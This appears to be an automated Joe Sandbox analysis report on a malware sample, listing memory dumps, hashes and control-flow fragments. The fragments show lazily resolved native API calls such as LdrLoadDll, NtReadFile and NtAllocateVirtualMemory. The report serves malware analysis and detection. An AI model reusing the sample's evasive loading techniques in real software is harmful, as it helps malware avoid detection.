                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6e6d4702bda9aa33a486fdb32158c84a5527f58512d9be3ebe89e4bdff4c7767
                                                                                                                      • Instruction ID: 2176718ebeaecc0111342b9814ce4c02cf68a459934262ed11a3889a7099e9d8
                                                                                                                      • Opcode Fuzzy Hash: 6e6d4702bda9aa33a486fdb32158c84a5527f58512d9be3ebe89e4bdff4c7767
                                                                                                                      • Instruction Fuzzy Hash: 3DE1FB74E01219CFCB14DFA9C9809AEFBF2BF89305F249169D414A739ADB30A941CF61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6d5287627b5259a3a572ceb0d4550020a2e77d3627bde13f09381768d618d533
                                                                                                                      • Instruction ID: 1ecc93941161eafce04cb07fe60cbd3e014a8d5078064e576d77f047c0750b21
                                                                                                                      • Opcode Fuzzy Hash: 6d5287627b5259a3a572ceb0d4550020a2e77d3627bde13f09381768d618d533
                                                                                                                      • Instruction Fuzzy Hash: 93A18032E002258FCF05DFB6C9445AEB7B2FF85304B96416BE805AB265DB31E94ACF40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1708223217.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5450f5240eade0fbe89d7c5106ce51ae794365023d26ac9292e2b30b029cb9ea
                                                                                                                      • Instruction ID: 7dce0af153047c404e54175d3dd9f9c29c1bbd09a649e9fa4be980af139593fa
                                                                                                                      • Opcode Fuzzy Hash: 5450f5240eade0fbe89d7c5106ce51ae794365023d26ac9292e2b30b029cb9ea
                                                                                                                      • Instruction Fuzzy Hash: 45C16AB0800745ABD330CF25EA4C6997BB1FB85364F54470BD1616B2E5EBBE188ADF60

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                      Signature Coverage:5.8%
                                                                                                                      Total number of Nodes:556
                                                                                                                      Total number of Limit Nodes:73
execution_graph (interactive call-graph rendering; the serialized node/edge data that was flattened into the text here is omitted, and it was cut off at the end of the page). What the data records:

• Entry: 0x41f080 → 0x41b930 → 0x409d30; 556 nodes, 73 of them collapsed limit nodes (for example 0x414a40 "8 API calls", 0x40f700 "10 API calls", 0x4083a0 "11 API calls", 0x4087a0 "19 API calls").
• Every native call is reached through a lazy import resolver at 0x41af20, which calls 0x414e40 → 0x4152c0 (LdrLoadDll); 0x41ad30 invokes 0x41abf0 (the same resolver) some forty times in sequence to populate its import table up front.
• Resolved API wrappers: 0x41a320 NtCreateFile, 0x41a3d0 NtReadFile, 0x41a450 NtClose, 0x41a500 NtAllocateVirtualMemory, 0x41a5f0 RtlAllocateHeap, 0x41a630 RtlFreeHeap, 0x41a790 LookupPrivilegeValueW, 0x41a670 ExitProcess.
• Composite blocks: 0x414780 (LdrLoadDll, NtReadFile, NtClose), 0x414640 and 0x40c4b0 (LdrLoadDll, NtClose, plus LdrInitializeThunk stubs), 0x41bf90 (RtlAllocateHeap), 0x41cf90 (RtlAllocateHeap, RtlFreeHeap) and 0x41cf50 (RtlFreeHeap), all via LdrLoadDll.
• Eleven ntdll stubs between 0x1102ad0 and 0x1102fb0 are labelled LdrInitializeThunk and are called from 0x419de0, 0x419e80, 0x419ec0, 0x419fd0, 0x41a020, 0x41a1e0, 0x41a220, 0x41a4c0, 0x41a540 and 0x41a580.
408343 96251->96252 96253 40ace0 LdrLoadDll 96251->96253 96254 414e40 LdrLoadDll 96252->96254 96253->96252 96255 408353 96254->96255 96256 40835c PostThreadMessageW 96255->96256 96257 408370 96255->96257 96256->96257 96257->96177 96259 40f673 96258->96259 96265 419e50 96259->96265 96263 419d2c 96262->96263 96264 41af20 LdrLoadDll 96262->96264 96263->96185 96264->96263 96266 419e6c 96265->96266 96267 41af20 LdrLoadDll 96265->96267 96270 1102dd0 LdrInitializeThunk 96266->96270 96267->96266 96268 40f69e 96268->96177 96270->96268 96271->96107 96273 419f9c 96272->96273 96274 41af20 LdrLoadDll 96272->96274 96277 1102f30 LdrInitializeThunk 96273->96277 96274->96273 96275 40f4ee 96275->96112 96275->96114 96277->96275 96278->96119 96279->96124 96280->96129

Control-flow Graph
control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID: !JA$bMA$bMA
                                                                                                                      • API String ID: 2738559852-4222312340
                                                                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                      • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                      • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Control-flow Graph
control_flow_graph 268 40ace0-40acfc 269 40ad04-40ad09 268->269 270 40acff call 41cc10 268->270 271 40ad0b-40ad0e 269->271 272 40ad0f-40ad1d call 41d030 269->272 270->269 275 40ad2d-40ad3e call 41b460 272->275 276 40ad1f-40ad2a call 41d2b0 272->276 281 40ad40-40ad54 LdrLoadDll 275->281 282 40ad57-40ad5a 275->282 276->275 281->282
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                      • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                                                      • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                      • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95

Control-flow Graph
control_flow_graph 283 41a320-41a371 call 41af20 NtCreateFile
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                      • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                                                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                      • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Control-flow Graph
control_flow_graph 286 41a500-41a516 287 41a51c-41a53d NtAllocateVirtualMemory 286->287 288 41a517 call 41af20 286->288 288->287
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                      • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                                                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                      • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4

Control-flow Graph
control_flow_graph 289 41a4fb-41a53d call 41af20 NtAllocateVirtualMemory
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: aaf07d7c655785086d8b5f0a451b4062681b2a67c108c2b33990bb495246c866
                                                                                                                      • Instruction ID: 94507bbf397dcc5c3ac71cc5815c082cb0521fc5d078fd0b1a8f82b8904cbc8a
                                                                                                                      • Opcode Fuzzy Hash: aaf07d7c655785086d8b5f0a451b4062681b2a67c108c2b33990bb495246c866
                                                                                                                      • Instruction Fuzzy Hash: 48F030B62001496BCB15DF98DC85CA777A9BF88214B15865EFD489B203C634D865CBA0
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 3633968ca4f3d3abc0fc2ebd89152368de9531e50e60495f0fab90ebf612694e
                                                                                                                      • Instruction ID: 85268407bda5badd3f005600f786efbf3729bfdc64a558162e38e0f63659b094
                                                                                                                      • Opcode Fuzzy Hash: 3633968ca4f3d3abc0fc2ebd89152368de9531e50e60495f0fab90ebf612694e
                                                                                                                      • Instruction Fuzzy Hash: 00E0C272200204AFDB20DFA9DC89FEB7B68EF44364F14455AFA0CDB282C531E6118B90
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                      • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                                                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                      • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                                                                                      • Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
                                                                                                                      • Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                                                                                      • Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                                                                                      • Instruction ID: a97d590cc2441fe97374a348ef225c0c7b530a9c885c9f327d0efe79fc82d833
                                                                                                                      • Opcode Fuzzy Hash: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                                                                                      • Instruction Fuzzy Hash: 1090023224140803D1847158550464A500597D2301F95C025A0026654DCB158B5977A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                                                                                      • Instruction ID: bb80ee6a644a4d13a241bcf70687e77adda06130dc58ec189013a52a0ca52534
                                                                                                                      • Opcode Fuzzy Hash: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                                                                                      • Instruction Fuzzy Hash: FA90043735140003010DF55C17045075047D7D7351355C031F1017550CD731CD715331
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                                                                                      • Instruction ID: 47ec783c13350d00c6fecb8df1eda0765404297098ef74f093caedf616d7b3c8
                                                                                                                      • Opcode Fuzzy Hash: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                                                                                      • Instruction Fuzzy Hash: 7390022A25340003D1847158650860A500597D2202F95D425A0016558CCB1589695321
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                                                                                      • Instruction ID: 4d7fbd2b61014b47c020f5326d3fb0c5a9d228e24a8ab57affeee595efea0222
                                                                                                                      • Opcode Fuzzy Hash: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                                                                                      • Instruction Fuzzy Hash: 8D90022234140003D144715865186069005E7E2301F55D021E0415554CDB1589565322
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                                                                                      • Instruction ID: 07ec84986e349e873418cc0b275f2fe9209d884e2788ae7c54a8e750c7e0b0bb
                                                                                                                      • Opcode Fuzzy Hash: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                                                                                      • Instruction Fuzzy Hash: D1900222282441535549B15855045079006A7E1241795C022A1415950CC7269956D721
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                                                                                      • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                                                                                                      • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                                                                                      • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                                                                                      • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                                                                                                      • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                                                                                      • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                                                                                      • Instruction ID: caf486c23f7d10561983d9f01938330bd44fdbd48d637f37d166cc29bba03e3c
                                                                                                                      • Opcode Fuzzy Hash: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                                                                                      • Instruction Fuzzy Hash: 7F90023224140403D10475986508646500597E1301F55D021A5025555EC76589916231
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                                                                                      • Instruction ID: 8962f7a60ce07900451f513ede7e8aee07e69f896d8f36c8150418bfca071ff4
                                                                                                                      • Opcode Fuzzy Hash: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                                                                                      • Instruction Fuzzy Hash: 9B90026238140443D10471585514B065005D7E2301F55C025E1065554DC719CD526226
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                                                                                      • Instruction ID: 13f29a008d4aff3de88beb20a29d6af7b8ac2b1267209e1b279975a7cb71e307
                                                                                                                      • Opcode Fuzzy Hash: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                                                                                      • Instruction Fuzzy Hash: 7390023224180403D1047158591470B500597D1302F55C021A1165555DC72589516671
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                                                                                      • Instruction ID: c7573c559733c18d0b9ef95b84433b5540a2029404fa9d9445845791482fefe0
                                                                                                                      • Opcode Fuzzy Hash: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                                                                                      • Instruction Fuzzy Hash: 42900222641400434144716899449069005BBE2211755C131A0999550DC75989655765
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                                                                                      • Instruction ID: 1bcd6215ed89a47f4a9c973ee97d44075cf9abe8a4ec83358738595c0cacdc06
                                                                                                                      • Opcode Fuzzy Hash: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                                                                                      • Instruction Fuzzy Hash: 3E900222251C0043D20475685D14B07500597D1303F55C125A0155554CCB1589615621
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                                                                                      • Instruction ID: 6f7163a2a037d34a09574f2cdab892ab8aa50b620f195be909f9db5538d1929b
                                                                                                                      • Opcode Fuzzy Hash: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                                                                                      • Instruction Fuzzy Hash: 8B90022264140503D10571585504616500A97D1241F95C032A1025555ECB258A92A231
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                                                                                      • Instruction ID: a2984a9d76550ab227d15d05a84e0b9cb3e1b4e89a737c2cafba31b589a276dc
                                                                                                                      • Opcode Fuzzy Hash: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                                                                                      • Instruction Fuzzy Hash: A290047334140403D144715C55047475005D7D1301F55C031F5075554FC75DCFD57775
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                      • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                      • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                      • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                      Strings
Memory Dump Source
